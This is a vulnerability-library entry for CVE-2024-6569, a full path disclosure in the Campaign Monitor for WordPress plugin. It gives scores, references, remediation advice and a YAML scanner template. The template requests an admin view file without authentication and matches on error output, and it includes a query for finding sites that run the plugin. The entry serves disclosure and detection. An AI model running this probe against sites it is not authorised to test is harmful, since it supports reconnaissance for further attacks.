/Vulnerability Library

Campaign Monitor for WordPress - Information Disclosure

CVE-2024-6569
Early Release

Description

Campaign Monitor for WordPress plugin for WordPress versions up to 2.8.15 contains a full path disclosure caused by improper access restriction and enabled display_errors in /forms/views/admin/create.php, letting unauthenticated attackers retrieve server paths, exploit requires display_errors to be enabled.

Severity

Medium

CVSS Score

5.3

Exploit Probability

1%

Published Date

June 15, 2026

Template Author

aushack

CVE-2024-6569.yaml
id: CVE-2024-6569

info:
  name: Campaign Monitor for WordPress - Information Disclosure
  author: aushack
  severity: medium
  description: |
    Campaign Monitor for WordPress plugin for WordPress versions up to 2.8.15 contains a full path disclosure caused by improper access restriction and enabled display_errors in /forms/views/admin/create.php, letting unauthenticated attackers retrieve server paths, exploit requires display_errors to be enabled.
  impact: |
    Attackers can obtain server file paths, aiding in further exploitation of the website.
  remediation: |
    Update to the latest version of the plugin where the issue is fixed, or disable display_errors and restrict access to the affected file.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/forms-for-campaign-monitor/campaign-monitor-for-wordpress-2815-unauthenticated-full-path-disclosure
    - https://wordpress.org/plugins/forms-for-campaign-monitor/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-6569
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2024-6569
    epss-score: 0.00849
    epss-percentile: 0.53273
    cwe-id: CWE-200
  metadata:
    verified: true
    max-request: 2
    publicwww-query: "/wp-content/plugins/forms-for-campaign-monitor/"
  tags: cve,cve2024,wordpress,wp-plugin,fpd,campaigns,misconfig

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/forms-for-campaign-monitor/forms/views/admin/create.php"

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "Fatal error", "Uncaught Error") || contains_all(body, "Stack trace")'
          - 'contains(body, "forms-for-campaign-monitor")'
          - 'status_code == 200 || status_code == 500'
        condition: and
# digest: 490a00463044022064f9d8be7fc14642218f69f2127900f7f651f7c18cdc185b084c8394f1273fe90220016648bd6d6d5c0278c8261637e66dff34b60d2f9906915c31dc53cef1cf9001:922c64590222798bb761d5b6d8e72950
5.3Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
CVE ID:
cve-2024-6569
CWE ID:
cwe-200

References

https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/forms-for-campaign-monitor/campaign-monitor-for-wordpress-2815-unauthenticated-full-path-disclosurehttps://wordpress.org/plugins/forms-for-campaign-monitor/https://nvd.nist.gov/vuln/detail/CVE-2024-6569

Remediation Steps

Update to the latest version of the plugin where the issue is fixed, or disable display_errors and restrict access to the affected file.